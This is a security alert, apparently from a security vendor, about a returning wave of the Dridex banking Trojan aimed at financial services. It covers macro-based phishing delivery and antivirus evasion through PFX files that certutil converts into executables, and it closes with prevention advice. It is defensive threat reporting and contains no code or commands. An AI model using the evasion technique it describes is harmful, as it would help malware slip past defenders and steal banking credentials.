This is a security alert for all TruShield clients, the financial services industry, and the community as a whole. We have learned of a recent wave of threats targeting the financial services sector. The threat is the banking Trojan Dridex, which has returned with an improved technique that avoids detection by security software.
About The Trojan
Dridex is one of the most prevalent banking Trojans that affect users in the United States, Brazil, China, Germany, and Japan. It targets customers of the financial/banking industry and steals banking credentials and personal information through HTML injections. Dridex operates by sending a phishing email to a user with a Microsoft Word or Excel attachment, or a link to an exploit kit landing page. Once the user opens the document, the Dridex malware is installed. The user is asked to enable macros for the malicious code to work. This feature is disabled by default in Word and Excel.
According to Symantec, once an attacker gains access to the user’s system they can do the following:
- Upload and download files
- Monitor network traffic
- Take screenshots of a browser
- Add the compromised computer to a botnet
- Retrieve configuration details by communicating through a peer-to-peer protocol
- Download and execute additional modules
- Download and run other files and inject itself into browser processes for Internet Explorer, Chrome, and Firefox to monitor communications and steal information
How the New Mode of Operation Works
This new technique is different from the previous techniques used to infect users. Trend Micro researchers discovered that Dridex’s new mode of operation is downloading a Personal Information Exchange (PFX) file from macro scripts, and this file avoids detection by the antivirus software and infects a computer. These types of files used by software certificates for storing public and private encryption keys for various operations and does not get flagged by antivirus software and is ignored by future scans.
The delivery of this malware is the same, where a user is sent an email that asks them to download a file, and once the user downloads the file, they are prompted open a .ZIP attachment and the word document, and a .PFX file downloads. This file is encrypted and won’t run on the user’s system. Certutil is used convert the file from a .PFX to a .EXE file and decode it to infect the system with Dridex. Since the file is marked as safe by antivirus software, Dridex will go unnoticed.
The banking Trojan Dridex was latent and easily identified based on its old mode of operation. With its new mode of operation of avoiding detection from security software by using Personal Information Exchange files to infect a system, this will persist its prevalence because it will be harder to block, detect and mitigate.
Since the delivery of this malware still remains the same, some precautionary steps to take to prevent infections are:
- Do not open files or enable macros from unknown senders.
- Verify sources for emails about compromised accounts.
- Create a policy that will block messages with attachments from unknown sources.
- Raise awareness against this type of threat.
- If infected, change passwords for all accounts from a different system that is not infected.
- Update security software and operating system.